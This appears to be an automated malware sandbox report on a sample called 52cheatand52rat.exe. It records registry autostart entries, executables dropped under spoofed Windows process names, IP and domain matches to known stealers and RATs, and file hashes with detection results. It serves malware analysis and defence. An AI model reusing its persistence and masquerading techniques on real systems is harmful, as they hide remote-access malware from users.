                                      07:42:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"
                                      07:42:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"
                                      07:42:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"
                                      07:43:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
                                      07:43:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"
                                      07:43:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"
                                      07:43:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\Default User\ApplicationFrameHost.exe"
                                      07:43:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\blockweb\RuntimeBroker.exe"
                                      07:43:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\blockweb\WmiPrvSE.exe"
                                      07:43:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SgrmBroker "C:\Windows\INF\.NET Data Provider for Oracle\SgrmBroker.exe"
                                      07:44:04AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ukzoUeHPfeDwGdTDRNL "C:\Users\user\ukzoUeHPfeDwGdTDRNL.exe"
                                      07:44:12AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\AppReadiness\dwm.exe"

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      208.95.112.1file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                      • ip-api.com/line?fields=query,country
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • ip-api.com/line/?fields=hosting
                                      bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                      • ip-api.com/json/
                                      sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                      • ip-api.com/line/?fields=hosting
                                      Transferencia.docGet hashmaliciousQuasarBrowse
                                      • ip-api.com/json/
                                      SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • ip-api.com/json
                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                      • ip-api.com/line/?fields=hosting
                                      SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • ip-api.com/json
                                      SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                      • ip-api.com/line/?fields=hosting

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ip-api.comfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                      • 208.95.112.1
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 208.95.112.1
                                      bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Transferencia.docGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/Get hashmaliciousUnknownBrowse
                                      • 51.195.5.58
                                      SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • 208.95.112.1
                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • 208.95.112.1

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      TUT-ASUSfile.exeGet hashmaliciousWhiteSnake StealerBrowse
                                      • 208.95.112.1
                                      Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      O3o5Xzk5Wd.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                      • 208.95.112.1
                                      bLaLoo4ET5.exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      sipari_.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      Transferencia.docGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • 208.95.112.1
                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.Win64.Malware-gen.13500.20938.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                      • 208.95.112.1
                                      SecuriteInfo.com.Python.Muldrop.16.26792.13248.exeGet hashmaliciousBlank GrabberBrowse
                                      • 208.95.112.1

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (412), with no line terminators
                                      Category:dropped
                                      Size (bytes):412
                                      Entropy (8bit):5.832466179580188
                                      Encrypted:false
                                      SSDEEP:12:EUVg2MxIMMqFKdteCI/Kb13L5LAjMjszj3Z:EL2MxIZqFKd0d/KB3LVAjiSJ
                                      MD5:D5FA5EE4E200FE2867574F4AF31A973F
                                      SHA1:A0133F94DDF4E6DE36186063E6D7EBD3F292F246
                                      SHA-256:924C1A9BC933DA0E39F7DD90D74C43764EC4AC991500808F6F4428254EF2BB11
                                      SHA-512:07BCBE94A76BF0F711EACBC11398ABAB7AAFEF6E75F1F8C3422E2C79B6D6A41E397032938245E4FFFD20714FE253434402E1969572734226D46583EA2DCC1874
                                      Malicious:false
                                      Preview:qxI49HI51opdoAP0qZwk9iAsmI7bKN7cNDNKT7iDmCw9ymBbnOv5gjZHxaR1JqunqNQkxFgt1t77wA3AGgy5bC5noFW3pr36RISlWaoisCDwlcVwhRun1zMoRm6ssnDKzBporRop2PMZ8ICLtkVY6QEc6oTte6zF837kwrEPmEulmxqIku8IRpNj6NsD84L6aHaELbZCfGv1fc0J8LJu7rySpYni9BRs3yLeWl6JU5nL3VDdXiFwva8tTHYxx1DeyD8rRVwWOAZCEnYUUKKa5e7c0cLOMJVd1IW0XVMCwtivB5pqsEcnqniUFf0yJiJFo5K5Qi687InM6Mb4xffIqsxNkCv2fX3NjcGFuuZKIdpi9WX3D6BnDBZ6I7VOxEdkPamdFWJCGUAMCPONo1yjVPKiDK6x

                                      C:\Program Files (x86)\Common Files\Microsoft Shared\MSInfo\en-US\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files\7-Zip\Lang\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (440), with no line terminators
                                      Category:dropped
                                      Size (bytes):440
                                      Entropy (8bit):5.844783463771706
                                      Encrypted:false
                                      SSDEEP:12:srPRp/5qBjRcNxlDfwDnWqCDZg8QlGMkAAzF:srOeNxlDoWq6+OKAh
                                      MD5:4DC40A65996661CACC3E71AB2BA0F62A
                                      SHA1:13F5AE0D4887BF15E8ECE4FBAB59BF25A1E32DCE
                                      SHA-256:0FD8C19A2048E80DCAC3CFBB21F38578AF2E43080673523F1F0C374B290F6A76
                                      SHA-512:74BB69C0EA4DC7470195A9B44685284A42E2E85916598777534E5A954087A00D7AECACC2A146F603B687A22B82FE2AB1F4A1AB0B078C498D5E654532689F372A
                                      Malicious:false
                                      Preview:2aaF607xcIxlzloUZpQZYRlJaFHKMf2MUfSc7YbXyEaUyZpnE2iWbiClzQp0swk7PkRUTMWAO2lT0QVAadGT6gvwdqnrskoBecFOIUU2giHj6sui5oaPqQBtye0mjpRoOjzXLG2FINxYYMzv5EvDKZUNbVZnesT0QdUW3WXywUGcdmUmoFqf4OdzOl5zrOla46I51d2iq7RzS2uyBw9YBy6C9fIRbhGhtphgeYvLNIy66ngW1Gy5PMZGAF6VVkHJ0uGmUNTmAxL399FV8vaUsLRgQafYcZ0mApGMh3CnwM4bBfHBAlWjKxaockW3r5Kl7i3U23yFtwhgR0euTeY1CQcMOct6hI51CTedmwIGwR0YQ4WmGljMgSiqGqGaK1hk0pd8VBHhWSEvaD6UFH06itVtvxX6qs65uPhlaYQFdC0NOxQCtvUCBlCH

                                      C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Program Files\Windows Portable Devices\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):225
                                      Entropy (8bit):5.679728406242851
                                      Encrypted:false
                                      SSDEEP:6:ydzcvya3fj4LSp8z5L30HN+R9JtkuAQiZLuAo:ydzcqa3fj4ei5IWKkiZC
                                      MD5:01EC8BED1BD7379BF04D53D986266F7E
                                      SHA1:8BE8870081FBA2CDC4DF105A42DCF73BC9E5E168
                                      SHA-256:D43631B96DB20F07FA362480054F2BC4CC12BD13BBA523AF097C7BE50C09069D
                                      SHA-512:9EE7D5BE09BC7D83C5FD3D8BFB52125494A8B4A67589A319902549AA931273BA5238EB43554A0F2DC90ED0E109413E3DD7209A52E17639C191707072114CA02D
                                      Malicious:false
                                      Preview:7wUyQB6LmIejD3PAFwoi7Xbpga79b8LDkgA6Kj9AC8zT2UCyNbEEJIQjVpRzE6tn6a8g3Szgwng8iHwLYIwA3H3bQblfRK6FPLWbVf54liRgmRAN2Fb5KttyghPcrUOmrbtWuV02N1YUzXz8aXmLtA5fbi4yQcNRUpyLinchPisSVZ8JrQBTrC3rgN5MaBmuoGAKjoaw5E6KSmJCjvG9b3jRwHpUsPHO6

                                      C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):254
                                      Entropy (8bit):5.768259579575574
                                      Encrypted:false
                                      SSDEEP:6:1zWUyWLVQxQWzeWWo3T3Uit+tY9RBbsux09Is09olw5aBwBXT2FwyR:1zWUz+eWWo3T3dtDDlsux09AwwnXT0HR
                                      MD5:1E73BA0F0F1B3F2CCFBADAE8CC5AA592
                                      SHA1:9E847BCBAAC40FAB0566A8DAB54B40D3E08DAA4F
                                      SHA-256:B1A73E78010FD26B4736E53125723DB02ECAE7B6BFA8A2302302BA72519D051D
                                      SHA-512:EF6B460AD43D7C43913A960038FAE3F4A9FC53AEF70DA911751521F482A0C91C78C21610B816612FCAB6950343F878E02BCC21DC38610C5309FB9EC44F5C4D18
                                      Malicious:false
                                      Preview:c1t39ZWrEPlL3jamaXUb71gALBfLpUgvma9pWd3KLp5VJ2M5IJEmHOSkUss83KBuszjcjuQ7eJQR6L0TykDfP4oXIZUnv5RAnKmUSuVX3GI77AoJ1YKTGgeyLLTKanMi2PnvigADOqmIwqaIvKvWv74HqyJHaL6Q4jFrW2lVYGFZ3VCeuLYP10x4VfFtX2mCtWOMlsv2jZ7o2eOUwoWPwrYEvKV1x17fdCqgHz2Cagpb2JC1Ru7sfXQC8KbbW4

                                      C:\ProgramData\Package Cache\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}v14.36.32532\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Recovery\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (657), with no line terminators
                                      Category:dropped
                                      Size (bytes):657
                                      Entropy (8bit):5.884944834589869
                                      Encrypted:false
                                      SSDEEP:12:s+DogolqMBvA7dS49OQroMF32vZDIIEMBhOa3pra7ZsBw9pq:/Dogol7QVc632vt5xa7ZNbq
                                      MD5:C19C638EC7DCCE0A9D24111B58C4CAFA
                                      SHA1:6B68304AB04EF1183E2E3CAC44039761B8224036
                                      SHA-256:DBE4D6B24B42D47E87F5E72E7E243C7A97939CE66EC48CDAE9B49C1EB0C13CDF
                                      SHA-512:1CA53F9531FB91C01F3DCD9E6B4994E3A32144A3CFB44E86764DFD83EEBB05C20F1DDBAA38A5D54AEBCC012291EB59A685AA698DDFE543E52895A3CFE4486BA2
                                      Malicious:false
                                      Preview:WJAKgV3r1vcg2He8hVM4X33JNaRqLrbRLL1FwFgY2nLQIfOLPOBS96QcP17FDMfJTKUrQZLbyxCusnArLGb6qISP4Z05IaVpHB68Lh5zDjdL3gtl0P37vicK1Fw0jQTYcXmrrCgoKl3HpHVXqOE2gY3iivGFuEQwPFtg4B4ytPwJpVfutYKUMb1DdDJ65a3FVH2kYzdoUPJQmu3MPWVW45jyNpD0282SWqyid5V45gA7RlbsK6qjEhLZhDWtvmvWW1455VtUAbbX5mgmNUq6RTNzeZBZimISuokaqgwzMVinFxd4gufb6yEDoEagTTwYSJnRBG5rh1t6ujtr5G3xGrV6khvlFQf2iKU6KM2Zzx3FEHSEVtkNa9RlxqreUTmRV1YjOxgtNd8SxP1cOrQVpRbj3tIdfYEfLmtNtsziM197A8yizOQnDQlDZyqfoDOzYdHKfntf2sJySei45knQHbc5Bqy4CT3JmKjh1nCMfuvUGwv5PwkEZ7r7ALIzzydiy9LI4BDRibvXqHyO42pPtzuocmgpfMWqRMfHknAOtTf7LUQ3X456JNz9PgqSeXwVFFFdlrnQ2agZTwdHVnSkRZhDXg1E7ruVhK2GPxRpQoEsrZpcDi70FLEphCFFzjTKqK1I4W1hWmTmVzV70

                                      C:\Recovery\ukzoUeHPfeDwGdTDRNL.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\Default\6dd19aba3e2428

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with very long lines (570), with no line terminators
                                      Category:dropped
                                      Size (bytes):570
                                      Entropy (8bit):5.855260214799926
                                      Encrypted:false
                                      SSDEEP:12:OmYP39YFR6u0JhgQ0yqkvqNQ0vtQrSVGpMyhAg0RRj17:Oi30fg0kDvxVyMybep
                                      MD5:4F8A7449BC9A150E020141BC838CFDC0
                                      SHA1:62E443B7D2639584F1CC54D9DA208EDC2BBDC7FF
                                      SHA-256:D70E7FED1F3EE954A71DAA63795C8EA4D85EABBBA954FE8564AF8F2CB609C33A
                                      SHA-512:55DF1CDE709C924938DCD66C15E13D08670BA2160E6675B9D83835EE6234E570B19A0FC9FE52597BD0CA77BC0F78C65CD03736E653F69A66A806A59E6F87B49F
                                      Malicious:false
                                      Preview:nrGtSJxeIv5xifena5LdLh6WYxjKXrTanyZBW0AIzzAfWuaFbtQ146XGuuVfknHbcfJuFcQk5DnVhb9nWdtnabfraTRleeiMsiC1lq98cq51TCiSusIG4dAB9cTwLpFafan8ZICpeuLufoYYu81wWbROiB1IXMwxlfW2Yj3lqcmKSQfVE5BNxTEDJYaXR3SR7XJARg9KFPF3yH6SffEbKj9RaSt9JfUwJVM4GfDi61HhNKPBcH1vz1GXX1j9w9Aj5Ttd5CLAbffTccEPDshCoi7SPzgP5Ev60im4awFa51TTVw55wT6Ec85WVaNGf6EXujd30KyRmGGxPn7c3kclIqd1nPiAi949w6jwTBFmfpcW2IHsdvM4edPDFlQkmysmLHASEKJ1f0GcNH9eI0gxxAfTrfqrveAq60KvHznSlVZnWwz8mvcwS5yLlrliecGA0agX6NXSMNLck164psE9COXAB9JZOFyJOYx5QcBYYJkEuWkuuq3vYG8lCfV7E7EHZCNMDAoMqpk2oTQpZYpiLDuIZM3uHEUbFdprJXruBqEsfG7tOqhpSg5VRF

                                      C:\Users\Default\ApplicationFrameHost.exe

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2300928
                                      Entropy (8bit):7.579577025941164
                                      Encrypted:false
                                      SSDEEP:49152:ExAAnyf8vPgcj+Sx5j2KKcnhhhMssVDp:ExAWsGPgcjXKcnhhTs
                                      MD5:84C6CB042DC58A109DFA2DB8381BEC28
                                      SHA1:4A86E72E9D2C3E0C17CD3A09DF754169F4B7CE31
                                      SHA-256:2E09ED806F9A7C57186872AB3715909437E2729500BC194E0A2CF3405C4CD5F0
                                      SHA-512:C8EF31A3EAEAC8EF0FAA043D0BDD085063D54572D0A7EEFADE08A9DB5F97C397BB3270BACA71817DA9D91C0D1227FCEE9CE019065BB5A66F20FED9D7349AB0EF
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 88%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................."..6........#.. ... #...@.. ........................#...........@.................................`.#.K....`#.......................#...................................................... ............... ..H............text.....".. ...."................. ..`.sdata.../... #..0....".............@....rsrc........`#.......#.............@..@.reloc........#.......#.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\4811fe426320bd

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):185
                                      Entropy (8bit):5.572549083446099
                                      Encrypted:false
                                      SSDEEP:3:9EDLBRPosgpMPdRQC908/0cW6N4VsHgcdqC7snkjUId4BndQbJman7prAUR/WCyz:2DMTiFCCuCDW6NCsHgcgUsnqiCTBAURw
                                      MD5:E4ADAA6794F118425108580EF43B7470
                                      SHA1:C4E6176BB81A302D346DEF4143F3D3ACC4C2ECDE
                                      SHA-256:A3B242AB483B0EFFCE00DEF1D4042818B6F97D9D99325F0EB9F1E621E255AC3D
                                      SHA-512:CFA61AD6C43D8080A47853102EC37EA7236A6EB57D113A15711416A8558BD280D90EC832B1886D7646760E77FE582BFA36B0926664CF813A70A7ABFF709FEBF2
                                      Malicious:false
                                      Preview:BbdNDgArMQ1fQdNXQRvdRzOD72jMIODT1bN4bTqQuNbej6t4XqRgXK3MMZQL7yi8NhozQT57lftEXueBIoyc7g5qhBrCCeS5ocQBR4oEvT52azyb4ODTAFBqm8ROm24GMyZ5dctO9urnlCPsNPHyb95ibkYTmac2ZyqmZ37beyTQYXFjsjBWuGpM2

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):1492
                                      Entropy (8bit):5.3787668257697945
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                      MD5:761D1106534DF52590D691CAD8962C57
                                      SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                      SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                      SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\portrefNet.exe.log

                                      Download File
                                      Process:C:\blockweb\portrefNet.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1830
                                      Entropy (8bit):5.3661116947161815
                                      Encrypted:false
                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                      MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                      SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                      SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
